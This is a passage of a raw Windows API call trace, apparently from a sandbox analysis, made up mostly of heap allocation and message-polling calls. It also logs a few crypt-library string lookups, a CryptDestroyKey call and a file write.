(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0267.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.297] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.297] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.298] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.298] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.298] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.298] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.298] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.298] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.305] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f1e530*, nNumberOfBytesToWrite=0x8510, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f1e530*, lpNumberOfBytesWritten=0x8cf5e4*=0x8510, lpOverlapped=0x0) returned 1 [0267.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0267.308] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0267.308] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.308] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51a18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0267.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.309] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0267.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.309] CryptDestroyKey (hKey=0xa87050) returned 1 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0267.311] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.311] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.311] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.312] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.312] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.312] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0267.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.313] 